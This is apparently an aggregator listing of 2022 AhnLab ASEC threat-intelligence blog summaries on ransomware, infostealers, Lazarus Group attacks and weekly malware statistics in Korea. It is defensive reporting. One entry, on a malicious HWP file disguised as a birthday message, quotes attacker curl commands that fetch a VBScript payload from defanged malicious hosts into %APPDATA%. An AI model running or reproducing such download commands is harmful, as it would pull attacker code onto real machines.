| Src |
Date (GMT) |
Titre |
Description |
Tags |
Stories |
Notes |
 |
2022-11-10 05:49:52 |
Distribution of Word File (External + RTF) Modified to Avoid Detection (lien direct) |
Malicious MS Office Word documents have long been used for the distribution of additional RTF malware by exploiting the fact that Word files allow external connection. However, AhnLab has identified the files that seem to have been made to avoid anti-malware detection are being distributed in Korea. Similar to past cases, an email disguised as a work email with a Word document attachment is used, but a unique factor exists in the webSettings.xml.rels file which can be identified within the...
|
Malware
|
|
|
|
2022-11-10 05:49:05 |
Penetration and Distribution Method of Gwisin Attacker (lien direct) |
The attacker of Gwisin ransomware targets and penetrates the publicly available servers of companies. They then use the server as their foothold for distributing the ransomware into the internal infrastructure. It is known that the attacker uses various means such as SFTP, WMI, integrated management solution, and IIS web service to distribute the ransomware into the internal infrastructure. In this confirmed case, they used the IIS web service to distribute Gwisin ransomware. How Gwisin Attacker Penetrates a Server Unlike other...
|
Ransomware
|
|
|
|
2022-11-08 00:35:33 |
(Déjà vu) LockBit 3.0 Being Distributed via Amadey Bot (lien direct) |
The ASEC analysis team has confirmed that attackers are using Amadey Bot to install LockBit. Amadey Bot, a malware that was first discovered in 2018, is capable of stealing information and installing additional malware by receiving commands from the attacker. Like other malware strains, it is being sold in illegal forums and still being used by various attackers. It was used in the past to install ransomware by attackers of GandCrab or to install FlawedAmmyy by the TA505 group which...
|
Ransomware
Malware
|
|
|
|
2022-11-03 05:23:46 |
(Déjà vu) ASEC Weekly Malware Statistics (October 24th, 2022 – October 30th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from October 24th, 2022 (Monday) to October 30th (Sunday). For the main category, Infostealer ranked top with 43.2%, followed by downloader with 34.7%, backdoor with 19.4%, and ransomware with 2.2%. Top 1 – Agent Tesla AgentTesla is an Infostealer that ranked first place with 22.1%. It is an Infostaler that leaks user credentials saved in...
|
Ransomware
Malware
|
|
|
|
2022-11-03 05:23:28 |
Surtr Ransomware Being Distributed in Korea (lien direct) |
Through internal monitoring, the ASEC analysis team has recently discovered that Surtr ransomware is being distributed. This ransomware encrypts files, then adds a “[DycripterSupp@mailfence.com].[<random string>].Surtr” file extension to the original file extension name. When Surtr ransomware infects a system, it changes the desktop image of the infected PC and creates a ransom note (See Figures 1 and 2) to inform the user of the ransomware infection. Surtr also creates ransom note files (SURTR_README.hta and SURTR_README.txt) in folders containing the infected...
|
Ransomware
|
|
|
|
2022-11-02 01:49:15 |
Appleseed Being Distributed to Nuclear Power Plant-Related Companies (lien direct) |
The ASEC analysis team has recently discovered a case of AppleSeed being distributed to nuclear power plant-related companies. AppleSeed is a backdoor malware used by Kimsuky, one of the organizations affiliated with North Korea, and this malware is being actively distributed to many companies. The filenames of the AppleSeed dropper were identified by the ASEC analysis team as follows, and a double file extension was used to deceive users. When the file is executed, the encoded data inside is decoded...
|
Malware
|
|
|
|
2022-11-02 01:22:25 |
Elbie Ransomware Being Distributed in Korea (lien direct) |
The ASEC analysis team has identified through internal monitoring that the Elbie ransomware is being distributed under the disguise of ieinstal.exe, an Internet Explorer Add-on installation program. The initial executable decodes the internal data into an executable that performs the actual ransomware behavior (See Figure 2). Afterward, the decoded executable is injected into the process which has run recursion, and it checks whether the user PC uses the VM environment. The injected and executed ransomware drops a copy into the...
|
Ransomware
|
|
|
|
2022-10-31 01:58:18 |
AgentTesla Being Distributed via VBS (lien direct) |
The ASEC analysis team has recently identified that AgentTesla is being distributed through malicious VBS. The script file has multiple codes that have been obfuscated multiple times. AgentTesla has been found to be distributed last May through a Windows Help file (*.chm), and it seems that its distribution method is continuously changing. The VBS script is distributed as an attachment to emails. Recently, emails impersonating those from Korean corporations have also been identified. The compressed file contains the VBS, and...
|
|
|
|
|
2022-10-31 01:57:31 |
A Case of Malware Infection by the Lazarus Attack Group Disabling Anti-Malware Programs With the BYOVD Technique (lien direct) |
In the ASEC blog post uploaded on April 2022 (New Malware of Lazarus Threat Actor Group Exploiting INITECH Process, https://asec.ahnlab.com/en/33801/), the team discussed the fact that the Lazarus attack group had been exploiting the INITECH process to infect systems with malware. This article aims to cover the details of the Lazarus group using the watering hole technique to hack into systems before exploiting the vulnerability of the MagicLine4NX product from Dream Security in order to additionally hack into systems in...
|
Malware
Hack
Vulnerability
Threat
Medical
|
APT 38
|
|
|
2022-10-27 00:16:33 |
(Déjà vu) ASEC Weekly Malware Statistics (October 17th, 2022 – October 23rd, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from October 17th, 2022 (Monday) to October 23rd (Sunday). For the main category, info-stealer ranked top with 52.7%, followed by downloader with 37.0%, backdoor with 8.8%, ransomware with 1.0%, and banking malware with 0.5%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.4%. It is an info-stealer that leaks...
|
Ransomware
Malware
|
|
|
|
2022-10-27 00:05:57 |
Qakbot Malware Being Distributed in Korea (lien direct) |
The ASEC analysis team has identified the Qakbot malware that was introduced in the past is being distributed to Korean users. The overall operation process, including the fact that it uses ISO files, is similar to the previous version, but a process to bypass behavior detection was added. The email distributed to Korean users is as shown below. It has hijacked a normal existing email and replied to it with a malicious file in the attachment, and this distribution process...
|
Malware
|
|
|
|
2022-10-26 23:59:32 |
CoinMiner Being Installed on Vulnerable Apache Tomcat Web Server (lien direct) |
The ASEC analysis team has recently identified attacks targeting vulnerable Apache Tomcat web server. The Tomcat server that has not been updated to the latest version is one of the major attack vectors that exploit vulnerabilities. In the past, the ASEC blog has also covered attacks targeting Apache Tomcat servers with the vulnerable JBoss version installed. The attackers used JexBoss, a vulnerability exploitation tool, to install a WebShell before gaining control over the target system with the Meterpreter malware. Ordinarily,...
|
Vulnerability
|
|
|
|
2022-10-26 23:52:48 |
FormBook Malware Being Distributed as .NET (lien direct) |
The FormBook malware that was recently detected by a V3 software had been downloaded to the system and executed while the user was using a web browser. FormBook is an info-stealer that aims to steal the user’s web browser login information, keyboard input, clipboard, and screenshots. It targets random individuals, and is usually distributed through spam mails or uploaded to infiltrated websites. FormBook operates by injecting into a running process memory, and the targets of injection are explorer.exe and arbitrary...
|
Spam
Malware
|
|
|
|
2022-10-25 01:04:42 |
Amadey Bot Disguised as a Famous Korean Messenger Program Being Distributed (lien direct) |
On October 17th, 2022, the Korean Internet & Security Agency (KISA) published a security notice titled “Advising Caution on Cyber Attacks Exploiting the Kakao Service Malfunction Issue’, and according to the notice, malware disguised as a KakaoTalk installation file (KakaoTalkUpdate.zip etc.) is being distributed via email. The ASEC analysis team was able to secure a file that seems to be of the type while monitoring relevant samples. This malware has the same filename and icon as the actual messenger program,...
|
Malware
|
|
|
|
2022-10-25 00:52:47 |
(Déjà vu) ASEC Weekly Malware Statistics (October 10th, 2022 – October 16th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from October 10th, 2022 (Monday) to October 16th, 2022 (Sunday). For the main category, downloader ranked top with 44.4%, followed by info-stealer with 41.7%, backdoor with 12.5%, ransomware with 0.9%, and CoinMiner with 0.5%. Top1. SmokeLoader Smokeloader is infostealer / downloader malware that is distributed via exploit kits. This week, it ranked first place...
|
Ransomware
Malware
|
|
|
|
2022-10-25 00:43:50 |
Rapidly Evolving Magniber Ransomware (lien direct) |
The Magniber ransomware has recently been evolving rapidly. From changing its file extension, injection and to UAC bypassing techniques, the Magniber ransomware has been rapidly changing to bypass the detection of anti-malware software. This article summarizes the evolution of the Magniber ransomware in the last few months based on the analysis that had been previously performed. Table 1 shows the major characteristics of the distributed Magniber ransomware files by date. It had been distributed as five different file extensions (msi,...
|
Ransomware
|
|
|
|
2022-10-24 23:58:37 |
Analysis on Attack Techniques and Cases Using RDP (lien direct) |
Overview One of the previous ASEC blog posts discussed cases where attackers abused various remote control tools that are originally used for system management purposes to gain control over infected systems. This post will cover cases where RDP (Remote Desktop Protocol), a default service provided by baseline Windows OS, was used. RDP is commonly used in most attacks, and this is because it is useful for initial compromise or lateral movement in comparison to remote control tools that require additional...
|
|
|
|
|
2022-10-21 03:56:17 |
GuLoader Malware Disguised as a Word File Being Distributed in Korea (lien direct) |
The ASEC analysis team has discovered that the GuLoader malware is being distributed to Korean corporate users. GuLoader is a downloader that has been steadily distributed since the past, downloading various malware. The phishing mail being distributed is as follows, and has an HTML file attached. When the user opens the attached HTML file, a compressed file is downloaded from the URL below. The compressed file contains an IMG file and the GuLoader malware is inside this IMG file. GuLoader...
|
Malware
|
|
|
|
2022-10-21 02:30:43 |
Attackers Abusing Various Remote Control Tools (lien direct) |
Overview Ordinarily, attackers install malware through various methods such as spear phishing emails with a malicious attachment, malvertising, vulnerabilities, and disguising the malware as normal software and uploading them to websites. The malware that is installed include infostealers which steal information from the infected system, ransomware which encrypts files to demand ransom, and DDoS Bots which are used in DDoS attacks. In addition to these, backdoor and RAT are also major malware programs used by attackers. Backdoor malware is installed...
|
Ransomware
Malware
|
|
|
|
2022-10-18 23:44:15 |
(Déjà vu) ASEC Weekly Malware Statistics (October 3rd, 2022 – October 9th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from October 3rd, 2022 (Monday) to October 9th, 2022 (Sunday). For the main category, downloader ranked top with 45.0%, followed by info-stealer with 39.6%, backdoor with 14.6%, ransomware with 0.4%, and CoinMiner with 0.4%. Top1. SmokeLoader Smokeloader is infostealer / downloader malware that is distributed via exploit kits. This week, it ranked first place...
|
Ransomware
Malware
|
|
|
|
2022-10-12 04:48:14 |
Lazarus Group Uses the DLL Side-Loading Technique (mi.dll) (lien direct) |
While tracking the Lazarus attack group, the ASEC analysis team discovered that the attackers were using the DLL Side-Loading attack technique (T1574.002) by abusing legitimate applications in the initial compromise stage to achieve the next stage of their attack process. https://attack.mitre.org/techniques/T1574/002/ The DLL Side-Loading attack technique saves a legitimate application and a malicious DLL in the same folder path to enable the malicious DLL to also be executed when the application is run. In other words, it is a malware...
|
|
APT 38
|
|
|
2022-10-12 04:24:38 |
GlobeImposter Ransomware Being Distributed in Korea (lien direct) |
The ASEC analysis team has recently identified through internal monitoring that the GlobeImposter ransomware, which targets vulnerable MS-SQL servers, is being distributed. This GlobeImposter ransomware has also been mentioned in AhnLab TIP’s quarterly statistics, specifically in the ‘2022 1st and 2nd Quarter Statistical Report on Malware Targeting MS-SQL,’ and in the 2nd quarter, GlobeImposter took up 52.6% of ransomware targeting MS-SQL. It has been identified that the GlobeImposter ransomware is still appearing in the soon-to-be-released 3rd quarter statistics. This ransomware...
|
Ransomware
Malware
|
|
|
|
2022-10-12 04:18:45 |
(Déjà vu) ASEC Weekly Malware Statistics (September 26th, 2022 – October 2nd, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 26th, 2022 (Monday) to October 2nd, 2022 (Sunday). For the main category, downloader ranked top with 38.2%, followed by info-stealer with 35.1%, ransomware with 14.7%, backdoor with 11.6%, and CoinMiner with 0.4%. Top 1 – BeamWinHTTP BeamWinHTTP is a downloader malware that ranked top with 16.7%. BeamWinHTTP is distributed via malware disguised...
|
Ransomware
Malware
|
|
|
|
2022-10-12 04:01:25 |
Qakbot Being Distributed as ISO Files Instead of Excel Macro (lien direct) |
There is a recent increase in the distribution method of malware through ISO files. Among the malware, it has been identified that Qakbot, an online banking malware, has had its distribution method changed from Excel 4.0 Macro to ISO files. The ASEC blog introduced cases of ISO file usage for not only Qakbot, but also AsyncRAT, IcedID, and BumbleBee malware. As such, we can see that cases of using ISO files for malware distribution are increasing. The phishing mail that...
|
Malware
|
|
|
|
2022-10-05 01:33:03 |
Change in Magniber Ransomware (*.js → *.wsf) – September 28th (lien direct) |
The ASEC analysis team has explained through the blog post on September 8th that the Magniber ransomware has changed from having a CPL extension to a JSE extension. The attacker made another change after September 8th, changing the file extension from JSE to JS on September 16th. And on September 28th, the attacker changed the distribution method once again, changing the file extension from JS to WSF. It seems the attacker is continuously distributing variations to bypass various detection methods...
|
Ransomware
|
|
|
|
2022-09-28 04:06:47 |
(Déjà vu) ASEC Weekly Malware Statistics (September 19th, 2022 – September 25th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 19th, 2022 (Monday) to September 25th, 2022 (Sunday). For the main category, info-stealer ranked top with 51.3%, followed by backdoor with 21.1%, downloader with 17.2%, and ransomware with 10.3%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 20.7%. It is an info-stealer that leaks user credentials saved...
|
Ransomware
Malware
|
|
|
|
2022-09-28 03:48:50 |
LockBit 3.0 Ransomware Distributed via Word Documents (lien direct) |
The ASEC analysis team has identified that LockBit 3.0 ransomware distributed while disguised as job application emails in NSIS format is also being distributed in Word document format. The specific distribution channel has not yet been identified, but considering that the distributed file names include names of people such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx’, it is likely that they were distributed disguised as job applications, similar to the past cases. There is an external link in the...
|
Ransomware
|
|
|
|
2022-09-28 03:39:14 |
(Déjà vu) ASEC Weekly Malware Statistics (September 12th, 2022 – September 18th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 12th, 2022 (Monday) to September 18th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.5%, followed by downloader with 27.5%, backdoor with 19.9%, ransomware with 8.2%, and banking malware with 2.9%. Top 1 – AgentTesla AgentTesla is an infostealer that ranked first place with 18.1%. It is an info-stealer that...
|
Ransomware
Malware
|
|
|
|
2022-09-27 03:55:32 |
NSIS Type of LockBit 3.0 Ransomware Disguised as Job Application Emails Being Distributed (lien direct) |
In February and June, the ASEC Analysis team posted in the blog about LockBit 2.0 ransomware being distributed via email. In this blog, we will introduce the new version of the LockBit 3.0 ransomware that is still being distributed through similar method. While in June there were multiple cases of the ransomware being distributed disguised as a copyright-related email, recently it is being distributed as a phishing email disguised as an email on the subject of job applications. As shown in...
|
Ransomware
|
|
|
|
2022-09-23 00:14:52 |
FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers (lien direct) |
The ASEC analysis team is constantly monitoring malware distributed to vulnerable MS-SQL servers. The analysis team has recently discovered the distribution of FARGO ransomware that is targeting vulnerable MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware that targets vulnerable MS-SQL servers. In the past, it was also called the Mallox because it used the file extension .mallox. – [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers– [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers...
|
Ransomware
Malware
|
|
|
|
2022-09-22 05:47:21 |
Analysis Report on Lazarus Group\'s Rootkit Attack Using BYOVD (lien direct) |
Since 2009, Lazarus Group, known to be a group of hackers in North Korea, has been attacking not only Korea but various countries of America, Asia, and Europe. According to AhnLab’s ASD (AhnLab Smart Defense) infrastructure, in early 2022, the Lazarus Group performed APT (Advanced Persistent Threat) attacks on Korea’s defense, finance, media, and pharmaceutical industries. AhnLab closely tracked these APT attacks and discovered that these attacks incapacitate security products in the attack process. An analysis of the attack process...
|
Medical
|
APT 38
|
★★★★
|
|
2022-09-21 00:45:18 |
Video of Blocking Latest Magniber Ransomware Using V3 (AMSI + Memory Scan) (lien direct) |
The ASEC analysis team introduced the Magniber variants in the blog posted on September 15th. From September 16th, the Magniber ransomware script, whilst still a javascript, has its file extension changed from *.jse to *.js. As Magniber changed to javascript starting September 8th, its operational method has also changed from the previous method. The currently distributed javascript file contains a .NET DLL (see Figure 2), and injects the Magniber shell code into currently running processes. The overall operation flow of...
|
Ransomware
|
|
|
|
2022-09-21 00:28:20 |
(Déjà vu) ASEC Weekly Malware Statistics (September 5th, 2022 – September 11th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from September 5th, 2022 (Monday) to September 11th, 2022 (Sunday). For the main category, info-stealer ranked top with 47.1%, followed by downloader with 32.7%, backdoor with 12.5%, and ransomware with 7.7%. Top 1 – GuLoader GuLoader, which ranked first place with 21.1%, is a downloader malware that downloads additional malware and runs it. It...
|
Ransomware
Malware
|
|
|
|
2022-09-15 00:00:00 |
Change in Magniber Ransomware (*.cpl → *.jse) – September 8th (lien direct) |
After Magniber changed its method of distribution from an MSI format to a CPL format on July 20th, it has been monitored to show decreased distribution activity as of mid-August. While continuously monitoring for changes, the ASEC analysis team found that the distribution format of Magniber has changed from *.CPL (DLL type) to *.JSE (script) format starting from September 8th, 2022. As Magniber is one of the most damaging ransomware to Korean users and is employing various methods to bypass...
|
Ransomware
|
|
|
|
2022-09-14 00:40:00 |
Phishing Websites Disguised as Korean Groupware Login Website Being Distributed (lien direct) |
The ASEC analysis team has been building a honeypot to collect various malware strains that are being distributed both in Korea and overseas. The honeypot also collects phishing emails and recently caught one targeting Korean users, which was being distributed continuously to Korean email accounts only since August. The phishing website the email is redirected to is disguised as a login page for a Korean groupware site, and over 2,500 cases were confirmed to access the website. Thus users must...
|
Malware
|
|
|
|
2022-09-14 00:30:00 |
(Déjà vu) ASEC Weekly Malware Statistics (August 29th, 2022 – September 4th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 29th, 2022 (Monday) to September 4th, 2022 (Sunday). For the main category, info-stealer ranked top with 45.9%, followed by downloader with 28.1%, backdoor with 18.5%, ransomware with 6.2%, and CoinMiner and banking malware with 0.7% each. Top 1 – GuLoader GuLoader, which ranked first place with 22.6%, is a downloader malware that...
|
Ransomware
Malware
|
|
|
|
2022-09-05 03:51:49 |
HWP File Disguised as Personal Profile Form (OLE Object) (lien direct) |
The ASEC analysis team has recently identified a malicious HWP file that exploits OLE objects and flash vulnerabilities. The file uses a malicious URL identified in 2020. This URL contains a flash vulnerability (CVE-2018-15982) file, which requires users to take caution. The identified HWP file includes OLE objects, and the corresponding files are generated in the %TEMP% folder when the HWP file is opened. The created files are shown below. The HWP file does not directly use previously known files...
|
Vulnerability
|
|
|
|
2022-09-01 09:49:18 |
(Déjà vu) ASEC Weekly Malware Statistics (August 22nd, 2022 – August 28th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 22nd, 2022 (Monday) to August 28th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.0%, followed by backdoor with 31.8%, downloader with 21.4%, and ransomware with 5.8%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.7%. It is an info-stealer that leaks user credentials...
|
Ransomware
Malware
|
|
|
|
2022-09-01 09:47:35 |
(Déjà vu) ASEC Weekly Malware Statistics (August 15th, 2022 – August 21st, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 15th, 2022 (Monday) to August 21st, 2022 (Sunday). For the main category, info-stealer ranked top with 57.8%, followed by backdoor with 24.2%, downloader with 13.7%, ransomware with 3.7%, and CoinMiner with 0.6%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 38.5%. It is an info-stealer that leaks...
|
Ransomware
Malware
|
|
|
|
2022-09-01 01:51:53 |
Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) (lien direct) |
The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp Both commands save scripts in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript codes that perform features such as registering to task...
|
Malware
|
|
|
|
2022-08-31 23:27:23 |
Malicious Word Files Targeting Specific Individuals Related to North Korea (lien direct) |
The ASEC analysis team has discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is being perpetrated on those related to the field. The filenames of the recently confirmed Word files are as follows: Date Filename July 18th (Format Style) Collecting Feedback of Experts on 2022 National...
|
|
|
|
|
2022-08-31 23:26:41 |
RAT Tool Disguised as Solution File (*.sln) Being Distributed on Github (lien direct) |
The ASEC analysis team has recently discovered the distribution of a RAT Tool disguised as a solution file (*.sln) on GitHub. As shown in Figure 1, the malware distributor is sharing a source code on GitHub titled “Jpg Png Exploit Downloader Fud Cryter Malware Builder Cve 2022”. The file composition looks normal, but the solution file (*.sln) is actually a RAT tool. It is through methods like this that the malware distributor lures users to run the RAT tool by...
|
Malware
Tool
|
|
|
|
2022-08-31 23:25:00 |
Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies (lien direct) |
Recently, there have been frequent incidents where attackers infiltrated and took control of the internal network of Korean companies, starting with vulnerable servers externally exposed. Cases of Attacks Targeting Vulnerable Atlassian Confluence Servers Meterpreter Distributed to Vulnerable Server of Korean Medical Institution AsyncRAT Being Distributed to Vulnerable MySQL Servers This is a case of infiltration into an IIS web server or an MS Exchange server and is the same as previously known types. However, this post will discuss cases that...
|
|
|
|
|
2022-08-24 05:02:44 |
AsyncRAT Being Distributed in Fileless Form (lien direct) |
The ASEC analysis team has recently discovered that malicious AsyncRAT codes are being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails. AsyncRAT is an open-source RAT malware developed with .NET that can execute various malicious activities under the command of the attacker. The compressed file being distributed through phishing emails has an html file and executing this file will...
|
Malware
|
|
|
|
2022-08-24 04:26:37 |
BitRAT and XMRig CoinMiner Being Distributed via Windows License Verification Tool (lien direct) |
The ASEC analysis team has recently discovered the distribution of BitRAT and XMRig CoinMiner disguised as a Windows license verification tool. As introduced in previous posts, BitRAT has a history of being distributed on webhards as MS Windows license verification tools and MS Office installation programs. It is likely that the case covered by this post is being done by the same attacker. One thing to note is that a BitRAT remote control tool is installed in the environment without...
|
Tool
|
|
|
|
2022-08-18 00:26:46 |
(Déjà vu) ASEC Weekly Malware Statistics (August 8th, 2022 – August 14th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 8th, 2022 (Monday) to August 14th, 2022 (Sunday). For the main category, info-stealer ranked top with 41.9%, followed by backdoor with 38.4%, downloader with 16.8%, ransomware with 2.2%, and CoinMiner with 0.6%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.1%. It is an info-stealer that leaks...
|
Ransomware
Malware
|
|
|
|
2022-08-17 01:43:10 |
(Déjà vu) ASEC Weekly Malware Statistics (August 1st, 2022 – August 7th, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from August 1st, 2022 (Monday) to August 7th, 2022 (Sunday). For the main category, info-stealer ranked top with 47.4%, followed by backdoor with 22.6%, downloader with 20.0%, ransomware with 6.8%, banking with 2.6%, and CoinMiner with 0.5%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 25.8%. It is...
|
Ransomware
Malware
|
|
|
|
2022-08-08 02:21:33 |
Monero CoinMiner Being Distributed via Webhards (lien direct) |
Webhards are the main platforms that the attackers targeting Korean users exploit to distribute malware. The ASEC analysis team has been monitoring malware types distributed through webhards and uploaded multiple blog posts about them in the past. Generally, attackers distribute malware with illegal programs such as adult games and crack versions of games. Those who use webhards as a distribution path typically install RAT type malware such as njRAT, UdpRAT, and DDoS IRC Bot. The team has recently discovered the...
|
Malware
|
|
|
|
2022-08-03 02:20:00 |
(Déjà vu) ASEC Weekly Malware Statistics (July 25th, 2022 – July 31st, 2022) (lien direct) |
The ASEC analysis team is using the ASEC automatic analysis system RAPIT to categorize and respond to known malware. This post will list weekly statistics collected from July 25th, 2022 (Monday) to July 31st, 2022 (Sunday). For the main category, info-stealer ranked top with 38.6%, followed by backdoor with 38.1%, and downloader with 23.3%. Top 1 – Agent Tesla AgentTesla is an infostealer that ranked first place with 23.8%. It is an info-stealer that leaks user credentials saved in web...
|
Malware
|
|
|
|
2022-08-03 02:19:00 |
Gwisin Ransomware Targeting Korean Companies (lien direct) |
The cases of Gwisin ransomware attacking Korean companies are recently on the rise. It is being distributed to target specific companies. It is similar to Magniber in that it operates in the MSI installer form. Yet unlike Magniber which targets random individuals, Gwisin does not perform malicious behaviors on its own, requiring a special value for the execution argument. The value is used as key information to run the DLL file included in the MSI. As such, the file alone...
|
Ransomware
|
|
|
